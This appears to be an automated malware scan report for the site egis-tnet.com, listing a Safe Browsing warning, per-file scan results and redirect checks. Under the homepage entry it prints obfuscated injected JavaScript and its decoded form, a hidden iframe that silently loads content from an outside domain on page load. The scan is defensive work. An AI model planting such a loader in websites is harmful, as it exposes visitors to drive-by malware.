Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=egis-tnet.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.egis-tnet.com/ | 200 OK Content-Length: 19396 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{grebah++;}catch(hsens){try{sernbhsdfx|15232}catch(eryres){m=Math;if(m)f="flo"+"or";} n="1428..1755..1540..1485..1624..1575..1554..1650..448..1530..1596..1635..910..1500..1400..600..574..480..1722..195..140..1770..1358..1710..448..1575..1428..1710..1526..480..854..480..1400..1665..1386..1755..1526..1515..1540..1740..644..1485..1596..1515..1358..1740..1414..1035..1512..1515..1526..1515..1540..1740..560..585..1470..1530..1596..1455..1526..1515..546..615..826..195..140..1575..1428..1710..152 Decoded script: function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://unxajen.ru/count6.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://unxajen.ru/count6.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; Antivirus reports:
| ||
http://www.egis-tnet.com/wp-content/themes/choice/js/dropmenu.jquery.js | 200 OK Content-Length: 54106 Content-Type: text/javascript | clean |
http://www.egis-tnet.com/wp-content/themes/choice/js/dropmenu.js | 200 OK Content-Length: 342 Content-Type: text/javascript | clean |
http://www.egis-tnet.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: text/javascript | clean |
http://www.egis-tnet.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: text/javascript | clean |
http://www.egis-tnet.com/wp-includes/js/tinymce/tiny_mce.js?ver=3.6.1 | 200 OK Content-Length: 231338 Content-Type: text/javascript | clean |
http://www.egis-tnet.com/wp-content/plugins/quick-post-widget/mce/tinybrowser/tb_tinymce.js.php?ver=3.6.1 | 200 OK Content-Length: 1255 Content-Type: application/x-javascript | clean |
http://www.egis-tnet.com/wp-content/plugins/quick-post-widget/js/ui.datepicker.min.js?ver=3.6.1 | 200 OK Content-Length: 36051 Content-Type: text/javascript | clean |
http://www.egis-tnet.com/wp-content/plugins/quick-post-widget/js/ui.datepicker-en.js?ver=3.6.1 | 200 OK Content-Length: 1127 Content-Type: text/javascript | clean |
http://www.egis-tnet.com/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.10.3 | 200 OK Content-Length: 4289 Content-Type: text/javascript | clean |
http://www.egis-tnet.com/wp-includes/js/jquery/ui/jquery.ui.widget.min.js?ver=1.10.3 | 200 OK Content-Length: 6488 Content-Type: text/javascript | clean |
http://www.egis-tnet.com/wp-includes/js/jquery/ui/jquery.ui.mouse.min.js?ver=1.10.3 | 200 OK Content-Length: 2841 Content-Type: text/javascript | clean |
http://www.egis-tnet.com/wp-includes/js/jquery/ui/jquery.ui.resizable.min.js?ver=1.10.3 | 200 OK Content-Length: 17273 Content-Type: text/javascript | clean |
http://www.egis-tnet.com/wp-includes/js/jquery/ui/jquery.ui.draggable.min.js?ver=1.10.3 | 200 OK Content-Length: 18559 Content-Type: text/javascript | clean |
http://www.egis-tnet.com/wp-includes/js/jquery/ui/jquery.ui.button.min.js?ver=1.10.3 | 200 OK Content-Length: 7143 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: egis-tnet.com
Result:
GET / HTTP/1.1
Host: egis-tnet.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: egis-tnet.com
Referer: http://www.google.com/search?q=egis-tnet.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: egis-tnet.com
Referer: http://www.google.com/search?q=egis-tnet.com
Result:
The result is similar to the first query. There are no suspicious redirects found.